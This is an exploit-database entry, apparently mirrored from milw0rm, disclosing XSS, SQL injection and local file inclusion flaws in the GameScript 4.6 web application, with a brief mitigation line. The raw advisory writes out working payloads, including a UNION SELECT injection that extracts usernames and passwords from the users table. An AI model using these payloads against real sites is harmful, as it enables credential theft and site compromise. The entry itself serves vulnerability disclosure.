header-logo
Suggest Exploit
vendor:
GameScript
by:
Encrypt3d.M!nd
7.5
CVSS
HIGH
XSS, SQL Injection, Local File Include
79, 89, 22
CWE
Product Name: GameScript
Affected Version From: 4.6
Affected Version To: 4.6
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

GameScript 4.6 Multiple Vulnerabillities

The GameScript 4.6 web application is vulnerable to XSS, SQL Injection and Local File Include attacks. An attacker can inject malicious JavaScript code into the search parameter of the /games.php page, inject malicious SQL code into the user parameter of the /page.php page, and include a malicious file into the file_to_include parameter of the /page.php page.

Mitigation:

Input validation, parameterized queries, and file access control should be implemented to prevent these attacks.
Source

Exploit-DB raw data:

GameScript 4.6 Multiple Vulnerabillities
(Earlier versions might be affected)

By : Encrypt3d.M!nd

Demo :www.gsdemo.com
just bored  :) 
There are other vulnerabillities i think

Iam Iraqian...Not Arabian
###################################################

Xss :

/games.php?search="<script>alert(666);</script>


Sql injection :

/page.php?page=viewprofile&user=-Encrypt3d'%20union%20select%201,2,username,4,5,password,7,8,9,10,11,12%20from%20users/*

Local File Include :

/page.php?page=file_to_include

# milw0rm.com [2009-01-28]

Navigation

Suggest Exploit

Services By CQR